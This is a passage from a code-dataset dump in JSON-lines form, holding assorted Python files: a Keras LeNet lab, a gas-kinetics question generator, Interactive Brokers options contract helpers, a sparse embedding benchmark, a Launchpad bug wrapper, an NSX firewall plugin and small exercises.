tf.expand_dims(x, -1), input_shape=input_shape))\n        input_shape = (input_shape[0], input_shape[1], 1)\n\n    model.add(Conv2D(32, kernel_size=(3, 3), strides=(1, 1), padding='valid', activation='elu', input_shape=input_shape))\n    model.add(Conv2D(64, kernel_size=(3, 3), strides=(1, 1), padding='valid', activation='elu'))\n    model.add(MaxPooling2D(pool_size=(2, 2)))\n    model.add(Dropout(dropout_amount))\n    \n    model.add(Flatten())\n    \n\n    model.add(Dense(layer_size, activation='elu'))\n    model.add(Dropout(dropout_amount))\n    \n    model.add(Dense(num_classes, activation='softmax'))\n    \n    ##### Your code above (Lab 2)\n\n    return model\n\n","sub_path":"lab2/text_recognizer/networks/lenet.py","file_name":"lenet.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"}
+{"seq_id":"250443528","text":"import random\nimport math\n\n# Calculate root mean square velocity of a gas molecule having molar mass of m at t degree C.\n# If a gas molecule has root mean square velocity of v and is at a temperature t. What is the molar mass of the gas.\n\nqns = open('./questions.txt', 'w')\nans = open('./answers.txt','w')\n\nno_of_samples = 1500000\n\nr = 8.31\n\ndef cal1(m,t1) :\n    t1 = t1 + 273 \n    return math.sqrt((3*r*t1*1000)/m) \n\ndef cal2(v,t1) : \n    t1 = t1 + 273 \n    return (3*r*t1*1000)/(v*v) \n\ndef type1() :\n    t1 = random.randint(100,1600)\n    m = random.randint(1,400)\n    t = random.randint(1,2)\n    if t == 1 :\n        q = \"Calculate root mean square velocity of a gas molecule having molar mass of \" + str(m) + \" g/mol at \" + str(t1) + \" degree C.\\n\"\n    else :\n        q = \"Calculate root mean square velocity of a gas molecule having molar mass of \" + str(m) + \" g/mol at \" + str(t1) + \" degree C. (R = 8.31 J/molK)\\n\"\n    a = \"{:.1e}\".format(cal1(m,t1)) + \"m/s\\n\"\n    return q,a\n\ndef type2() :\n    t1 = random.randint(100,1600)\n    v = random.randint(1000,2000)\n    t = random.randint(1,2)\n    if t == 1 :\n        q = \"If a gas molecule has root mean square velocity of \" + str(v) + \" m/s and is at a temperature \" + str(t1) + \" degree C. What is the molar mass of the gas.\\n\"\n    else :\n        q = \"If a gas molecule has root mean square velocity of \" + str(v) + \" m/s and is at a temperature \" + str(t1) + \" degree C. What is the molar mass of the gas. 
(R = 8.31 J/molK)\\n\"\n a = \"{:.1e}\".format(cal2(v,t1)) + \"g/mol\\n\"\n return q,a\n\nfor i in range(no_of_samples):\n types = random.randint(1,2)\n if types == 1 :\n ques, answer = type1()\n else :\n ques, answer = type2()\n qns.write(ques)\n ans.write(answer)\n\nqns.close()\nans.close()\n","sub_path":"science/KineticTheoryOfGases/vrms/vrms.py","file_name":"vrms.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"300740639","text":"import math\n\na, b = input().split(' ')\na = int(a)\nb = int(b)\n\nflag = True\n\nlim1 = math.ceil(math.sqrt(a))\nlim2 = math.ceil(math.sqrt(b))\n\nsum = 0\nfor i in range(2, lim1):\n if a % i == 0:\n t = a // i\n sum += i\n if t != i:\n sum += t\nsum += 1 # increment for divider 1\nif sum != b:\n flag = False\n\nsum ^= sum\nfor i in range(2, lim2):\n if b % i == 0:\n t = b // i\n sum += i\n if t != i:\n sum += t\nsum += 1 # increment for divider 1\nif sum != a:\n flag = False\n\nprint('YES' if flag else 'NO')","sub_path":"informatics/112196.py","file_name":"112196.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"504009678","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass EnabledProtocols(Model):\n \"\"\"Class to specify which protocols are enabled.\n\n All required parameters must be populated in order to send to Azure.\n\n :param download: Required. Enable Download protocol or not\n :type download: bool\n :param dash: Required. Enable DASH protocol or not\n :type dash: bool\n :param hls: Required. Enable HLS protocol or not\n :type hls: bool\n :param smooth_streaming: Required. 
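A quick numeric sanity check of the v_rms formula used above, v = sqrt(3RT/M), with the molar mass converted from g/mol via the factor of 1000 (the gas and temperature below are just an example):

import math

R = 8.31            # J/(mol*K)
T = 25 + 273        # 25 degree C in kelvin
M = 28              # molar mass of N2 in g/mol
v_rms = math.sqrt(3 * R * T * 1000 / M)
print('%.1e m/s' % v_rms)   # roughly 5.2e+02 m/s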
Enable SmoothStreaming protocol or not\n :type smooth_streaming: bool\n \"\"\"\n\n _validation = {\n 'download': {'required': True},\n 'dash': {'required': True},\n 'hls': {'required': True},\n 'smooth_streaming': {'required': True},\n }\n\n _attribute_map = {\n 'download': {'key': 'download', 'type': 'bool'},\n 'dash': {'key': 'dash', 'type': 'bool'},\n 'hls': {'key': 'hls', 'type': 'bool'},\n 'smooth_streaming': {'key': 'smoothStreaming', 'type': 'bool'},\n }\n\n def __init__(self, **kwargs):\n super(EnabledProtocols, self).__init__(**kwargs)\n self.download = kwargs.get('download', None)\n self.dash = kwargs.get('dash', None)\n self.hls = kwargs.get('hls', None)\n self.smooth_streaming = kwargs.get('smooth_streaming', None)\n","sub_path":"azure-mgmt-media/azure/mgmt/media/models/enabled_protocols.py","file_name":"enabled_protocols.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"582740641","text":"####\n#### 2 places need to change\n# 1: muHead(),\n# 2: myContract_Specs for OPT specifications\n\nfrom ContractSamples import ContractSamples\nimport datetime\nimport time\nimport os\nimport subprocess\nimport numpy as np\n\ndef myHead():\n myHistDate = [\"20201022 23:59:00 GMT\", \"50 D\", \"20 mins\", \"MIDPOINT\"]\n #myHistDate = [\"20201030 23:59:00 GMT\", \"30 D\", \"1 hour\", \"MIDPOINT\"]\n #myHistDate = [\"20201106 23:59:00 GMT\", \"300 D\", \"1 day\", \"MIDPOINT\"]\n myHistDate = [\"20201106 23:59:00 GMT\", \"360 D\", \"1 day\", \"MIDPOINT\"]\n myHistDate = [\"20191230 23:59:00 GMT\", \"300 D\", \"1 day\", \"MIDPOINT\"]\n\n mySymbol = 'SPY'\n myType = 'STK'\n return mySymbol, myType, myHistDate\n#\n# Typical calling sequence below\n# mySymbol, myType, myHistDate = myHead()\n# myContracts = myContract_Specs(mySymbol, myType)\n\ndef myContract_Specs(mySymbol, myType):\n myRights = ['C', 'P']\n myStrikes = [0] * 1000\n myExpDates = [''] * 1000\n NF = 0\n # myType = 'OPT'\n # mySymbol = 'QQQ'\n\n print(mySymbol, myType)\n if (myType == 'STK'):\n myContract = ContractSamples.mySTK_Contract()\n myContract.symbol = mySymbol\n elif (myType == 'FUT'):\n myContract = ContractSamples.myFUT_Contract()\n myContract.symbol = mySymbol\n elif (myType == 'OPT'):\n myContract = ContractSamples.myOPT_Contract()\n myContract.symbol = mySymbol\n elif (myType == 'FOP'):\n myContract = ContractSamples.myFUTOPT_Contract()\n myContract.symbol = mySymbol\n else:\n print('No valid contract type is specified myType =', myType)\n return\n\n if (myType == 'STK' or myType == 'FUT'):\n return myContract\n\n # Options Contracts. 
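Typical usage of the generated EnabledProtocols model above is to pass the four required flags as keyword arguments; a hedged example (the flag values are invented):

# Hypothetical instantiation; all four protocol flags are required.
protocols = EnabledProtocols(
    download=False,
    dash=True,
    hls=True,
    smooth_streaming=False,
)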
Changes could be made here\n\n if (mySymbol == 'LYFT'):\n myStrikes = [24.0, 24.5, 25., 25.5, 26.0, 26.5, 27.0, 27.5, 28.0, 28.5, 29.0, 29.5, 30.0]\n myExpDates = ['1023', '1030', '1106','1113','1120','1127', '1204','1211','1218']\n myExpDates = ['1113']#,'1120','1127', '1204','1211','1218']\n myExpDates = ['1023','1030', '1106']\n for i in range(len(myExpDates)):\n myExpDates[i] = '2020' + myExpDates[i]\n #\n elif (mySymbol == 'JETS'):\n myStrikes = [16.5, 17.0, 17.5, 18.0, 18.5, 19.0]\n myExpDates = ['1023', '1030', '1106'] #, '1113', '1120', '1127', '1218']\n myExpDates = ['1106', '1113', '1120', '1127', '1218']\n for i in range(len(myExpDates)):\n myExpDates[i] = '2020' + myExpDates[i]\n #\n elif (mySymbol == 'SPY'):\n for i in range(41):\n myStrikes[i] = 320.0 + i * 1 # 320 to 360\n myExpDates = ['1023', '1026', '1028', '1030',\n '1102'] # , '1104', '1106', '1111', '1113', '1116', '1118', '1120']\n for i in range(len(myExpDates)):\n myExpDates[i] = '2020' + myExpDates[i]\n #\n elif (mySymbol == 'QQQ'):\n for i in range(41):\n myStrikes[i] = 260 + i * 1 # 260 to 300\n myExpDates = ['1023', '1030', '21106', '1113', '1120', '1127', '1218']\n for i in range(len(myExpDates)):\n myExpDates[i] = '2020' + myExpDates[i]\n #\n elif (mySymbol == 'ES'):\n myStrikes = [0] * 61\n for i in range(len(myStrikes)):\n myStrikes[i] = 3200.0 + i * 5 # 3200 to 3500\n myExpDates = ['1023', '1026', '1028', '1030',\n '1102'] # , '1104', '1106', '1111', '1113', '1116', '1118', '1120']\n for i in range(len(myExpDates)):\n myExpDates[i] = '2020' + myExpDates[i]\n else:\n print('No valid symbol is specified for OPT aor FOP contracts. mySymbol = ', mySymbol)\n return\n\n ii = 0\n myContracts = [None] * 1000\n for right in myRights:\n for strike in myStrikes:\n for expdate in myExpDates:\n if (myType == 'OPT'):\n myContract = ContractSamples.myOPT_Contract()\n elif (myType == 'FOP'):\n myContract = ContractSamples.myFUTOPT_Contract()\n myContract.symbol = mySymbol\n myContract.right = right\n myContract.strike = strike\n myContract.lastTradeDateOrContractMonth = expdate\n myContracts[ii] = myContract\n ii = ii + 1\n #print('ii=',ii-1,myContracts[ii-1])\n\n NF = ii\n myContracts = myContracts[0:NF]\n # for i in range(NF):\n # print('---- All contracts', i, ' ', myContracts[i])\n\n if(NF==1):\n myContracts = myContracts[0:NF]\n\n return myContracts\n\n\ndef from_myContracts(Contracts, input):\n NF = len(Contracts)\n Data = [None]*NF\n if(input == 'Right'):\n i=0\n for contract in Contracts:\n Data[i] = contract.right\n i = i+1\n elif (input == 'Strike'):\n i = 0\n for contract in Contracts:\n Data[i] = contract.strike\n i = i + 1\n elif (input == 'ExpDate'):\n i = 0\n for contract in Contracts:\n Data[i] = contract.lastTradeDateOrContractMonth\n i = i + 1\n\n data2 = list(set(Data))\n data3 = np.sort(data2)\n return data3 #unique values\n#\n# def my_nearest_filename(filename):\n# myfolder, symbol, secType, myenddate, myduration, \\\n# myfreq, myMidType, right, strike, Exp = parse_filename(filename) #all strings\n#\n# fileseg1 = myfolder + symbol + '_' + secType + '_'\n# fileseg2 = '_' + myfreq + '_' + myMidType\n# if ((secType == 'OPT') or (secType == 'FOP')):\n# fileseg2 = fileseg2 + '_' + right +'_'+str(strike) + '_'+ Exp + '.csv'\n# else:\n# fileseg2 = fileseg2+'.csv'\n#\n# lsnames = myfolder + fileseg1 + '*' +fileseg2\n# cmd = 'ls ' + lsnames + ' > junk2.ps'\n# os.system(cmd)\n# with open(\"junk.ps\", \"r\") as junkfile:\n# texts = junkfile.readlines()\n# enddays = [20201022] * 1000\n# durdays = [100] * 
1000\n#\n# dd1\n# i = 0\n# for line in texts:\n# line = line.rstrip().lstrip()\n# a = line.split(\"_\")\n# enddays[i] = int(a[2])\n# durdays[i] = int(a[3][0:len(a[3] - 1)])\n# i = i + 1\n# NC = i\n# enddays = enddays[0:NC]\n# durdays = durdays[0:NC]\n#\n# filename = symbol + '_' + secType + '_' + myenddate + '_' + myduration + '_' + myfreq + '_' + myMidType\n# if ((secType == 'OPT') or (secType == 'FOP')):\n# filename = filename + '_' + right + '_' + strike + '_' + Exp\n#\n#\n\ndef parse_filename(filename):\n\n c = filename.split('/')\n myfolder = c[0]+'/'+c[1]+'/'+c[2]+'/'\n\n cc = c[3]\n ccc = f1.split('_')\n symbol = ccc[0]\n secType = ccc[1]\n myenddate = ccc[2]\n myduration = ccc[3]\n myfreq = ccc[4]\n myMidType = ccc[5]\n right = 'C'\n strike = '0'\n Exp = '20201030'\n if ((secType == 'OPT') or (secType == 'FOP')):\n right = ccc[6]\n strike = ccc[7]\n Exp = ccc[8]\n\n return myfolder, symbol, secType, myenddate, myduration, myfreq, myMidType,right,strike,Exp\n\ndef print_list(x2):\n print('in print_list ---> type(x2), len(x2),type(x2[0]), x2[0], x2[-1]):')\n print(' ',type(x2), len(x2), type(x2[0]), x2[0],' .... to ....', x2[-1])\n\ndef myfilenames_req(myHistDate, myContracts):\n\n try:\n NF = len(myContracts)\n except:\n NF = 1 #not a list of contracts\n\n\n if(NF == 1):\n myContracts = [myContracts]*1\n\n print(myHistDate)\n# for contract in Contracts:\n# print(contract)\n\n myjunk = myHistDate\n myenddate = myjunk[0].split(\" \")[0]\n myduration = myjunk[1].split(\" \")[0] + myjunk[1].split(\" \")[1]\n myfreq = myjunk[2].split(\" \")[0] + myjunk[2].split(\" \")[1]\n mytype = myjunk[3]\n myfilenames = [''] * NF\n\n for ii in range(NF):\n myfolder = 'data/' + str(myContracts[ii].symbol) + '/' + str(myContracts[ii].secType) + '/'\n if (os.path.isdir('data/' + str(myContracts[ii].symbol)) == False):\n os.mkdir('data/' + str(myContracts[ii].symbol))\n if (os.path.isdir(myfolder) == False):\n os.mkdir(myfolder)\n myfilenames[ii] = str(myContracts[ii].symbol) + '_' + str(myContracts[ii].secType) \\\n + '_' + myenddate + '_' + myduration + '_' + myfreq + '_' + mytype\n if ((myContracts[ii].secType == 'OPT') or (myContracts[ii].secType == 'FOP')):\n myfilenames[ii] = myfilenames[ii] + '_' + myContracts[ii].right + '_' \\\n + str(myContracts[ii].strike) + '_' \\\n + myContracts[ii].lastTradeDateOrContractMonth\n myfilenames[ii] = myfolder + myfilenames[ii] + '.csv'\n\n for i in range(NF):\n print('---- All filenames', i, ' ', myfilenames[i])\n\n if(NF == 1):\n myfilenames = myfilenames[0]\n\n return myfilenames\n#\n#\n\n#\n# #####################################################\n#\n# myqueryTime = (datetime.datetime.today() - datetime.timedelta(days=10)).strftime(\"%Y%m%d %H:%M:%S\")\n# myqueryTime = \"20201022 24:00:00 GMT\" # end data\n# myHistDate = [myqueryTime, \"50 D\", \"20 mins\", \"MIDPOINT\"] # TRADES BID-ASK MIDPOINT\n# #\n# mySymbol = 'JETS' #'ES' #LYFT'\n# myType = 'OPT' #'FUT' #FOP' #OPT' #STK'\n# #\n# myContracts = myContract_Specs(mySymbol, myType)\n# # filenames = myfilenames_req(myHistDate, myContracts)\n#\n# filename = get_filename(myHistDate, 'LYFT', 'OPT', 'C', 26.0, '20201030')\n#\n# print(filename)","sub_path":"myContract_Spec.py","file_name":"myContract_Spec.py","file_ext":"py","file_size_in_byte":9366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"282546683","text":"\"\"\"\n Copyright (c) 2022, NVIDIA CORPORATION.\n \n Licensed under the Apache License, Version 2.0 (the \"License\");\n you may not use this 
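A standalone sketch of the round trip that myfilenames_req and parse_filename above perform: the basename encodes symbol, security type, end date, duration, bar size and price type, with right/strike/expiry appended for options. The helper name and the sample path are illustrative assumptions:

import os

def parse_contract_filename(path):
    folder, basename = os.path.split(path)
    parts = os.path.splitext(basename)[0].split('_')
    fields = dict(zip(
        ['symbol', 'secType', 'endDate', 'duration', 'freq', 'midType'],
        parts[:6]))
    if fields['secType'] in ('OPT', 'FOP'):
        fields.update(zip(['right', 'strike', 'expiry'], parts[6:9]))
    return folder, fields

print(parse_contract_filename(
    'data/SPY/OPT/SPY_OPT_20201106_360D_1day_MIDPOINT_C_340.0_20201113.csv'))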
file except in compliance with the License.\n You may obtain a copy of the License at\n \n http://www.apache.org/licenses/LICENSE-2.0\n \n Unless required by applicable law or agreed to in writing, software\n distributed under the License is distributed on an \"AS IS\" BASIS,\n WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n See the License for the specific language governing permissions and\n limitations under the License.\n\"\"\"\n\nimport time\nimport argparse\nimport numpy as np\nimport tensorflow as tf\nimport horovod.tensorflow as hvd\n\nfrom sparse_operation_kit import experiment as sok\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--batch_size\", type=int, default=8192)\n parser.add_argument(\"--hotness\", type=int, default=2)\n parser.add_argument(\"--combiner\", type=str, default=\"sum\")\n parser.add_argument(\"--key_space\", type=int, default=1024 * 1024)\n parser.add_argument(\"--dim\", type=int, default=4)\n parser.add_argument(\"--iters\", type=int, default=100)\n args = parser.parse_args()\n args.iters = max(args.iters, 10)\n\n hvd.init()\n gpus = tf.config.experimental.list_physical_devices(\"GPU\")\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n if gpus:\n tf.config.experimental.set_visible_devices(gpus[hvd.local_rank()], \"GPU\")\n sok.init()\n\n offsets = np.random.randint(1, args.hotness + 1, args.iters * args.batch_size)\n offsets = tf.convert_to_tensor(offsets, dtype=tf.int64)\n values = np.random.randint(0, args.key_space, tf.reduce_sum(offsets))\n values = tf.convert_to_tensor(values, dtype=tf.int64)\n total_indices = tf.RaggedTensor.from_row_lengths(values, offsets)\n\n v = tf.Variable(tf.random.normal(shape=[args.key_space, args.dim]), dtype=tf.float32)\n sok_v = sok.Variable(v)\n\n @tf.function\n def sok_step(param, indices):\n with tf.GradientTape() as tape:\n embedding = sok.lookup_sparse(param, indices, None, args.combiner)\n loss = tf.reduce_sum(embedding)\n grads = tape.gradient(loss, [param])\n return loss, grads\n\n ts = []\n t = time.time()\n for i in range(args.iters):\n ts.append(time.time() - t)\n t = time.time()\n left = args.batch_size // hvd.size() * hvd.rank()\n left += i * args.batch_size\n right = args.batch_size // hvd.size() * (hvd.rank() + 1)\n right += i * args.batch_size\n loss, _ = sok_step(sok_v, total_indices[left:right])\n loss = loss.numpy()\n sok_result = sum(ts[5:]) / (args.iters - 5) * 1000\n\n @tf.function\n def tf_step(param, indices):\n with tf.GradientTape() as tape:\n embedding = tf.nn.embedding_lookup_sparse(param, indices, None, combiner=args.combiner)\n loss = tf.reduce_sum(embedding)\n grads = tape.gradient(loss, [param])\n return loss, grads\n\n ts = []\n t = time.time()\n for i in range(args.iters):\n ts.append(time.time() - t)\n t = time.time()\n left = args.batch_size // hvd.size() * hvd.rank()\n left += i * args.batch_size\n right = args.batch_size // hvd.size() * (hvd.rank() + 1)\n right += i * args.batch_size\n sp_ids = total_indices[left:right].to_sparse()\n loss, _ = tf_step(v, sp_ids)\n loss = loss.numpy()\n tf_result = sum(ts[5:]) / (args.iters - 5) * 1000\n\n print(\"---------------------------------------------\")\n print(\"* batch_size : %d\" % args.batch_size)\n print(\"* local batch_size : %d\" % (args.batch_size // hvd.size()))\n print(\"* hotness : %d\" % args.hotness)\n print(\"* combiner : %s\" % args.combiner)\n print(\"* key_space : %d\" % args.key_space)\n print(\"* dim : %d\" % args.dim)\n 
print(\"---------------------------------------------\")\n print(\"* sok.lookup_sparse : %.3f ms/iter\" % sok_result)\n print(\"* tf lookup_sparse : %.3f ms/iter\" % tf_result)\n print(\"---------------------------------------------\")\n","sub_path":"sparse_operation_kit/sparse_operation_kit/experiment/benchmark/lookup_sparse_benchmark.py","file_name":"lookup_sparse_benchmark.py","file_ext":"py","file_size_in_byte":4187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"317599677","text":"def myscript():\n d = {}\n list2 = []\n# for line in open(\"/Users/kathy/Google\\ Drive/Python/UW\\ 2015/Course\\ I/workspace/IntroPython2015/Examples/students.txt\"):\n for line in open('students.txt'):\n\n text = line[line.index(\":\"):].rstrip()\n# print(text)\n list1 = text.split(\" \")\n# print(list1)\n# for n in list1:\n# if n not in d.keys():\n# d[n] = 1\n# else:\n# d[n] += 1\n for n in list1:\n if n not in list2:\n list2.append(n)\n# f.closed\n\n# print(d)\n# print(list2)\n unique = set(list2)\n print(unique)\n\n# for line in open('students.txt'):\n# print(line)\n# print(\"****\")\n\nmyscript()\n","sub_path":"students/kathleen/session04/fileio.py","file_name":"fileio.py","file_ext":"py","file_size_in_byte":730,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"633319316","text":"# This is a wrapper, which converts launchpad bug structure into a internal bug object.\n#\n# When you get certain properties of the bug (e.g. assignee), it usually does additional query to LP.\n# This wrapper avoids doing any calls to Launchpad by going into internal representation of the object and grabbing the info from JSON.\n\nimport string\nimport lpdata\n\nFIELDS_TO_COPY = [\n \"date_assigned\",\n \"date_closed\",\n \"date_confirmed\",\n \"date_created\",\n \"date_fix_committed\",\n \"date_fix_released\",\n \"date_in_progress\",\n \"date_incomplete\",\n \"date_left_closed\",\n \"date_left_new\",\n \"date_triaged\",\n \"importance\",\n \"status\"\n]\n\nFIELDS_TO_COPY_FROM_JSON = [\n \"assignee_link\",\n \"milestone_link\",\n \"title\",\n \"web_link\"\n]\n\nclass Bug():\n\n # I'm too lazy to deal with UTF-8 at this point\n # need this make sure the bugs from Chinese people don't cause exceptions\n def sanitize_string(self, s):\n return filter(lambda x: x in string.printable, s)\n\n def __init__(self, lpbug):\n \n # straight copy fields from the lpbug object. this do not make any calls to LP\n for name in FIELDS_TO_COPY:\n setattr(self, name, getattr(lpbug, name))\n\n # copy fields from JSON internals to avoid additional \"lazy init\" queries to LP (as it would kill performance)\n for name in FIELDS_TO_COPY_FROM_JSON:\n setattr(self, name, lpbug._wadl_resource.representation[name])\n\n # extract assignee (i.e. https://api.launchpad.net/1.0/~dshulyak -> dshulyak)\n self.assignee = str(self.assignee_link).rsplit('~', 1)[-1]\n self.assignee_link = \"https://launchpad.net/~\" + self.assignee\n if (self.assignee is None) or (self.assignee == \"None\"):\n self.assignee = \"\"\n self.assignee_link = \"\"\n\n # extract milestone (i.e. https://api.launchpad.net/1.0/fuel/+milestone/4.1 -> 4.1)\n self.milestone = str(self.milestone_link).rsplit('/', 1)[-1]\n\n # extract title (i.e. Bug #1247284 in Fuel for OpenStack: \"Verify Networks doesn't wait long enough for dhcp response\")\n self.title = self.sanitize_string(self.title).split(':', 1)[1].strip(\" \\\"\")\n\n # extract id from web link (i.e. 
https://bugs.launchpad.net/fuel/+bug/1247284 -> 1247284)\n self.id = str(self.web_link).rsplit('/', 1)[-1]\n\n def get_status_changes(self):\n # Bug statuses:\n # * Incomplete -> date_incomplete\n # * New (not targeted to any release) -> date_created\n # * Open -> date_triaged (date_confirmed, date_left_new, date_assigned)\n # * In Progress -> date_in_progress\n # * Resolved -> date_fix_committed\n # * Verified -> date_fix_released\n\n # if the bug is \"New\", it should not be displayed on the chart\n if self.status in lpdata.LaunchpadData.BUG_STATUSES[\"New\"]:\n return []\n\n # list of dates\n result = []\n\n # When the bug was assigned to the release\n date_open = min(d for d in [self.date_triaged, self.date_confirmed, self.date_left_new, self.date_assigned] if d is not None)\n result.append( {\"date\": date_open, \"type\": \"Open\", \"matches\": [s for s in lpdata.LaunchpadData.BUG_STATUSES[\"Open\"] if s != \"In Progress\"]} )\n\n # When the bug went to in progress state\n date_in_progress = self.date_in_progress\n result.append( {\"date\": date_in_progress, \"type\": \"In Progress\", \"matches\": [\"In Progress\"]} )\n\n # When the bug was resolved or closed (e.g. as invalid)\n date_resolved = next((d for d in [self.date_fix_committed, self.date_closed] if d is not None), None)\n result.append( {\"date\": date_resolved, \"type\": \"Resolved\", \"matches\": [s for s in lpdata.LaunchpadData.BUG_STATUSES[\"Closed\"] if s != \"Fix Released\"]} )\n\n # When the bug was verified\n date_verified = self.date_fix_released\n result.append( {\"date\": date_verified, \"type\": \"Verified\", \"matches\": [\"Fix Released\"]} )\n\n # When the bug was set as incomplete\n date_incomplete = self.date_incomplete\n result.append( {\"date\": date_incomplete, \"type\": \"Incomplete\", \"matches\": lpdata.LaunchpadData.BUG_STATUSES[\"Incomplete\"]} )\n\n # Remove all entries which have date as \"None\"\n result = [e for e in result if e[\"date\"] is not None]\n\n # Filter dates and statuses which are out of line\n for i in range(0, len(result)):\n for j in range (i + 1, len(result)):\n if result[i][\"date\"] > result[j][\"date\"]:\n result[i][\"obsolete\"] = True\n\n # Remove all obsoleted entries\n result = [e for e in result if not \"obsolete\" in e]\n\n # Find the first element which matches our bug status\n idx = -1\n for i in range(0, len(result)):\n if self.status in result[i][\"matches\"]:\n idx = i\n break\n\n # The date for our status is not found. Not sure if it can happen\n if idx < 0:\n return []\n\n # Get the corresponding prefix of result, so it ends with the right status (the status in which our bug is in)\n result = result[:idx+1]\n\n return result\n","sub_path":"launchpad/bug.py","file_name":"bug.py","file_ext":"py","file_size_in_byte":5200,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"76050232","text":"# Copyright 2018 VMware, Inc.\n# All Rights Reserved\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nfrom neutron_lib import exceptions as n_exc\nfrom neutron_lib.plugins import directory\n\nfrom vmware_nsx.plugins.nsx import utils as tvd_utils\n\ntry:\n from neutron_fwaas.services.firewall import fwaas_plugin\nexcept ImportError:\n # FWaaS project no found\n from vmware_nsx.services.fwaas.common import fwaas_mocks \\\n as fwaas_plugin\n\n\n@tvd_utils.filter_plugins\nclass FwaasTVPluginV1(fwaas_plugin.FirewallPlugin):\n \"\"\"NSX-TV plugin for Firewall As A Service - V1.\n\n This plugin adds separation between T/V instances\n \"\"\"\n methods_to_separate = ['get_firewalls',\n 'get_firewall_policies',\n 'get_firewall_rules']\n\n def validate_firewall_routers_not_in_use(\n self, context, router_ids, fwid=None):\n # Override this method to verify that the router & firewall belongs to\n # the same plugin\n context_plugin_type = tvd_utils.get_tvd_plugin_type_for_project(\n context.project_id, context)\n core_plugin = directory.get_plugin()\n for rtr_id in router_ids:\n rtr_plugin = core_plugin._get_plugin_from_router_id(\n context, rtr_id)\n if rtr_plugin.plugin_type() != context_plugin_type:\n err_msg = (_('Router should belong to the %s plugin '\n 'as the firewall') % context_plugin_type)\n raise n_exc.InvalidInput(error_message=err_msg)\n","sub_path":"vmware_nsx/services/fwaas/nsx_tv/plugin_v1.py","file_name":"plugin_v1.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"214444389","text":"# Exercise\n\n# Create a function named is anagram following your current language's style guide. \n# It should take two strings and return a boolean value depending on whether its an anagram or not.\n\n\ndef dict_of_letters(a_str):\n a_dict = {}\n for c in a_str:\n if c not in a_dict:\n a_dict[c]=1\n else:\n a_dict[c] += 1\n return a_dict\n\ndef is_anagram(str1, str2):\n print(str1)\n print(str2)\n if dict_of_letters(str1) == dict_of_letters(str2):\n return True\n else:\n return False\n \n # A function with for loop\n #\n # d1 = dict_of_letters(str1)\n # l1 = sorted(d1.keys())\n # d2 = dict_of_letters(str2)\n # l2 = sorted(d2.keys())\n # for i in range(len(l1)):\n # if l1[i] != l2[i] or d1[l1[i]] != d2[l2[i]]:\n # return False\n # return True\n\nprint(is_anagram(\"kék\", \"zöld\"))\n\nprint(is_anagram(\"animali\", \"almaini\"))\n\n","sub_path":"week-02/day-05/anagram.py","file_name":"anagram.py","file_ext":"py","file_size_in_byte":916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"442329619","text":"\"\"\"\nAuris Surgical Robotics, Inc.\n(C) Copyright 2015. 
All Rights Reserved.\n\nDescription: Library for setting up python for use with developmental systems\n\nAuthor: Ben Fredrickson\nDate: Jan 2015\n\"\"\"\n\nimport sys\nimport os\nimport time\nfrom winreg import *\n\n#load the path for \nreg = OpenKey(HKEY_LOCAL_MACHINE, \"SOFTWARE\\\\Python\\\\PythonCore\\\\%s\\\\\" % (sys.version[:3]))\naurispath = QueryValue(reg, \"AurisPath\")\nsys.path.append(aurispath)\n\n\n# Add auris dlls to the path for importing\nos.environ[\"PATH\"] += \";\" + aurispath + \"..\\\\DLLS;\"\n\nimport AurisInterface\n\nLOW_LEVEL_VERSION = 8\n\ng_btnMap = {\n 'DUP': 0,\n 'DDWN': 1,\n 'DLEFT': 2,\n 'DRIGHT': 3,\n 'START': 4,\n 'BACK': 5,\n 'STICKPRESSL': 6,\n 'STICKPRESSR': 7,\n 'LEFTB': 8,\n 'RIGHTB': 9,\n 'A': 10,\n 'B': 11,\n 'X': 12,\n 'Y': 13,\n }\n\ng_jntMap = {\n 'LX': 0,\n 'TRIGL': 1,\n 'LY': 2,\n 'RX': 3,\n 'RY': 4,\n 'TRIGR': 5,\n }\n\nclass PyAurisInterface(object):\n def __init__(self):\n # make sure the interface is initailized for the correct use case\n self.interInit = False\n self.idmInit = False\n self.visionInit = False\n self.gamepadInit = False\n self.slideInit = False\n\n # need a ref to AurisInterface for the garbage collector\n self.interface = AurisInterface\n if (AurisInterface.GetVersion() != LOW_LEVEL_VERSION):\n print(\"Python Lib does not match compiled Lib\",\n AurisInterface.GetVersion(),\n \"!= auris low level version\",\n LOW_LEVEL_VERSION)\n raise Exception(\"Version Mismatch.\")\n\n\n def __del__(self):\n 